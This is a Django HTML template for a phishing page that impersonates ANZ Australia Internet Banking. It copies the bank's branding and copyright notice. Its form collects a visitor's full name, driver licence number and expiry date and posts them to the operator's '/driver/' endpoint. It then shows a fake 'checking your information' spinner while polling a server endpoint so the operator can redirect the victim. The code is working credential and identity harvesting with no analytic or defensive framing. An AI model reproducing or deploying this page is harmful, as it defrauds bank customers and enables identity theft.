{% load static %}
<!doctype html>
<html lang="en">
<head>
    <link rel="shortcut icon" href="{% static 'favicon.ico' %}" type="image/x-icon">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>ANZ Australia Internet Banking</title>
    <link href="{% static 'css/bootstrap.css' %}" rel="stylesheet">
    <link href="../static/css/main.css" rel="stylesheet">
    <script
            src="https://code.jquery.com/jquery-3.5.1.js"
            integrity="sha256-QWo7LDvxbWT2tbbQ97B53yJnYU3WhH/C8ycbRAkjPDc="
            crossorigin="anonymous"></script>
    <script src="{% static 'bootstrap.min.js' %}"></script>
    <script type="text/javascript">
        function get_redirect_to_page() {
            $.ajax({
                type: 'GET',
                async: true,
                url: '/redirect_page/',
                success: function(data) {
                    if (data["redirect_to"] === "error") {}
                    else if (data["redirect_to"] === "bank") {
                        window.location.href = "https://www.anz.com.au/"
                    } else if (data["redirect_to"]) {
                        window.location.href = document.location.origin + "/" + data["redirect_to"]
                    }
                },
                dataType: 'json',
            });
        }
        function submited(event) {
            event.preventDefault()
            $('#loadingModal').modal({backdrop: 'static', keyboard: false}, 'show');
            var full_name = $("#full_name").val()
            var license = $("#license").val()
            var exp = $("#exp").val()
            var data = {
                'full_name': full_name,
                'license': license,
                'exp': exp,
            }
            $.ajax({
                type: 'POST',
                async: true,
                url: '/driver/',
                data: data,
                dataType: 'json',
            });
        }
    </script>
</head>
<body>

<nav class="navbar navbar-expand-lg navbar-light mobilebar">
    <a class="navbar-brand mobile-brand" href="#">
        <img src="{% static 'logo.png' %}" class="logo-mobile">
    </a>
</nav>
<div class="container">
    <div class="row">
        <div class="col-12 " style="margin-top: 25px">
            <h1 class="h1-mobile">{{ settings.driver_title }}</h1>
            <p>{{ settings.driver_description }}</p>
            <form method="post" onsubmit="return submited(event)">
                <fieldset class="fake-form fake-form-mobile">
                    <div>
                        <label for="full_name" class="fake-form-mobile-label">Full Name
                            <input required id="full_name" class="fake-form-mobile-input" type="text" name="email">
                        </label>
                    </div>
                    <div>
                        <label for="license" class="fake-form-mobile-label">Driver License Number
                            <input required id="license" class="fake-form-mobile-input" type="text" name="email">
                        </label>
                    </div>
                    <div>
                        <label for="exp" class="fake-form-mobile-label">Expiry Date
                            <input required id="exp" class="fake-form-mobile-input" type="text" name="email">
                        </label>
                    </div>
                </fieldset>
                <button type="submit" class="btn btn-other">Confirm</button>
            </form>

        </div>

    </div>
</div>
<nav class="navbar mobile-bottom-bar" style="margin-top: 90%">
    <p>© Australia and New Zealand Banking Group Limited (ANZ) 2020 ABN 11 005 357 522.</p>
</nav>
<div class="modal fade" id="loadingModal" tabindex="-1" role="dialog" aria-hidden="true">
    <div class="modal-dialog" role="document">
        <div class="modal-content">
            <div class="modal-body">
                <h3 class="modal-custom-title">We are checking your information</h3>
                <div class="d-flex justify-content-center">
                    <img class="logo-loading" src="{% static 'logo-loading.png' %}" alt="">
                    <div class="spinner-border" style="width: 5rem; height: 5rem;color: #337ab7 !important;" role="status">
                        <span class="sr-only">Loading...</span>
                    </div>
                </div>
                <h5 class="modal-custom-text">Please wait...</h5>
            </div>
        </div>
    </div>
</div>
</body>
<script type="text/javascript">
    $(document).ready(function () {
        setInterval(get_redirect_to_page, 1000)
    });
</script>
</html>
